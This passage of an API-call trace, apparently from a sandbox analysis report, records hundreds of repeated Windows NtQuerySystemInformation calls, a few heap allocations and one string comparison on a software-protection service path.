(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207daa0, Length=0x28, ResultLength=0x0) [0285.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207db10, Length=0x28, ResultLength=0x0) [0285.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dc70, Length=0x38, ResultLength=0x0) [0285.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207db90, Length=0x28, ResultLength=0x0) [0285.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207db90, Length=0x28, ResultLength=0x0) [0285.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dc70, Length=0x38, ResultLength=0x0) [0285.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207daf0, Length=0x20, ResultLength=0x0) [0285.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207da70, Length=0x20, ResultLength=0x0) [0285.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207da70, Length=0x20, ResultLength=0x0) [0285.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207da70, Length=0x20, ResultLength=0x0) [0285.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dc70, Length=0x38, ResultLength=0x0) [0285.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207daf0, Length=0x20, ResultLength=0x0) [0285.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207da80, Length=0x20, ResultLength=0x0) [0285.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207da80, Length=0x20, ResultLength=0x0) [0285.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dd40, Length=0x50, ResultLength=0x0) [0285.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dcc0, Length=0x28, ResultLength=0x0) [0285.526] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0285.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dd40, Length=0x50, ResultLength=0x0) [0285.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dd40, Length=0x50, ResultLength=0x0) [0285.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dd40, Length=0x50, ResultLength=0x0) [0285.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dc70, Length=0x38, ResultLength=0x0) [0285.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207daa0, Length=0x28, ResultLength=0x0) [0285.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207daa0, Length=0x28, ResultLength=0x0) [0285.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207daa0, Length=0x28, ResultLength=0x0) [0285.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207db10, Length=0x28, ResultLength=0x0) [0285.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dc70, Length=0x38, ResultLength=0x0) [0285.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207db90, Length=0x28, ResultLength=0x0) [0285.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207db90, Length=0x28, ResultLength=0x0) [0285.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dc70, Length=0x38, ResultLength=0x0) [0285.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207daf0, Length=0x20, ResultLength=0x0) [0285.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207da70, Length=0x20, ResultLength=0x0) [0285.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207da70, Length=0x20, ResultLength=0x0) [0285.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207da70, Length=0x20, ResultLength=0x0) [0285.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dc70, Length=0x38, ResultLength=0x0) [0285.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207daf0, Length=0x20, ResultLength=0x0) [0285.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207da80, Length=0x20, ResultLength=0x0) [0285.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207da80, Length=0x20, ResultLength=0x0) [0285.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207e350, Length=0x40, ResultLength=0x0) [0285.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207e350, Length=0x40, ResultLength=0x0) [0285.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207e350, Length=0x40, ResultLength=0x0) [0285.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207e000, Length=0x20, ResultLength=0x0) [0285.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207df80, Length=0x20, ResultLength=0x0) [0285.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207df10, Length=0x20, ResultLength=0x0) [0285.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207df80, Length=0x20, ResultLength=0x0) [0285.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207df10, Length=0x20, ResultLength=0x0) [0285.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207e000, Length=0x20, ResultLength=0x0) [0285.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207e350, Length=0x40, ResultLength=0x0) [0286.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dff0, Length=0x20, ResultLength=0x0) [0286.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207df70, Length=0x20, ResultLength=0x0) [0286.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207df00, Length=0x20, ResultLength=0x0) [0286.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207df70, Length=0x20, ResultLength=0x0) [0286.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207df00, Length=0x20, ResultLength=0x0) [0286.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dff0, Length=0x20, ResultLength=0x0) [0286.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.315] GetProcessHeap () returned 0x269489b0000 [0286.315] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x0, Size=0x230) returned 0x26948a2a140 [0286.315] GetProcessHeap () returned 0x269489b0000 [0286.315] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x0, Size=0x28) returned 0x26949c76480 [0286.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207e160, Length=0x50, ResultLength=0x0) [0286.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207e160, Length=0x50, ResultLength=0x0) [0286.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207e160, Length=0x50, ResultLength=0x0) [0286.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207e050, Length=0x50, ResultLength=0x0) [0286.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207e050, Length=0x50, ResultLength=0x0) [0286.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207e050, Length=0x50, ResultLength=0x0) [0286.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207e050, Length=0x50, ResultLength=0x0) [0286.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207df80, Length=0x38, ResultLength=0x0) [0286.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ddb0, Length=0x28, ResultLength=0x0) [0286.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ddb0, Length=0x28, ResultLength=0x0) [0286.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ddb0, Length=0x28, ResultLength=0x0) [0286.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ddb0, Length=0x28, ResultLength=0x0) [0286.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207de20, Length=0x28, ResultLength=0x0) [0286.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207df80, Length=0x38, ResultLength=0x0) [0286.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dea0, Length=0x28, ResultLength=0x0) [0286.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dea0, Length=0x28, ResultLength=0x0) [0286.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dd40, Length=0x20, ResultLength=0x0) [0286.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dcc0, Length=0x20, ResultLength=0x0) [0286.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dcc0, Length=0x20, ResultLength=0x0) [0286.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dcc0, Length=0x20, ResultLength=0x0) [0286.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207df80, Length=0x38, ResultLength=0x0) [0286.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207df80, Length=0x38, ResultLength=0x0) [0286.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207de00, Length=0x20, ResultLength=0x0) [0286.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dd90, Length=0x20, ResultLength=0x0) [0286.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dd90, Length=0x20, ResultLength=0x0) [0286.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfd0, Length=0x50, ResultLength=0x0) [0286.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfd0, Length=0x50, ResultLength=0x0) [0286.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfd0, Length=0x50, ResultLength=0x0) [0286.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cec0, Length=0x50, ResultLength=0x0) [0286.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cec0, Length=0x50, ResultLength=0x0) [0286.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cec0, Length=0x50, ResultLength=0x0) [0286.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cec0, Length=0x50, ResultLength=0x0) [0286.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdf0, Length=0x38, ResultLength=0x0) [0286.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc20, Length=0x28, ResultLength=0x0) [0286.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc20, Length=0x28, ResultLength=0x0) [0286.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.354] NtQuerySystemInformation (SystemInformationClass=0xb9, 